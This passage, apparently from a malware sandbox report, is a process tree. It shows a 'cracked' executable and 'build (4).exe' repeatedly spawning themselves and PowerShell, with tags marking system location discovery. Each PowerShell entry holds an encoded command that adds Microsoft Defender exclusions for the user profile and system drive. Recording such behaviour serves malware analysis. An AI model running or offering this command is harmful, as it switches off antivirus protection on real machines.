        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        195⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        195⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        195⤵
        
        PID:6280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        196⤵
        
        PID:8728
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        196⤵
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        196⤵
        
        PID:9324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        197⤵
        
        PID:10140
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        197⤵
        System Location Discovery: System Language Discovery
        
        PID:9376
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        197⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        198⤵
        System Location Discovery: System Language Discovery
        
        PID:9120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        199⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        198⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        198⤵
        
        PID:8404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        199⤵
        
        PID:9796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        200⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        199⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        199⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        200⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        200⤵
        
        PID:4840
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        200⤵
        System Location Discovery: System Language Discovery
        
        PID:8332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        201⤵
        
        PID:9220
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        201⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        201⤵
        
        PID:7304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        202⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        202⤵
        
        PID:10224
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        202⤵
        
        PID:8596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        203⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        203⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        203⤵
        
        PID:9720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        204⤵
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        204⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        204⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        205⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        205⤵
        
        PID:8560
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        205⤵
        
        PID:8780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        206⤵
        
        PID:9116
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        206⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        206⤵
        
        PID:7388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        207⤵
        
        PID:9720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        208⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        207⤵
        
        PID:7992
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        207⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        208⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        208⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        208⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        209⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        209⤵
        
        PID:9144
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        209⤵
        System Location Discovery: System Language Discovery
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        210⤵
        System Location Discovery: System Language Discovery
        
        PID:8292
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        210⤵
        
        PID:8388
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        210⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        211⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        211⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        211⤵
        System Location Discovery: System Language Discovery
        
        PID:5608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        212⤵
        System Location Discovery: System Language Discovery
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        212⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        212⤵
        System Location Discovery: System Language Discovery
        
        PID:8612
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        213⤵
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        213⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        213⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        214⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        214⤵
        
        PID:9960
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        214⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        215⤵
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        215⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        215⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        216⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        216⤵
        
        PID:8348
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        216⤵
        
        PID:7732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        217⤵
        
        PID:6984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        217⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        217⤵
        
        PID:7896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        218⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        218⤵
        
        PID:6376
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        218⤵
        
        PID:10108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        219⤵
        
        PID:7632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        220⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        219⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        219⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        220⤵
        
        PID:8872
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        220⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        220⤵
        
        PID:7752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        221⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
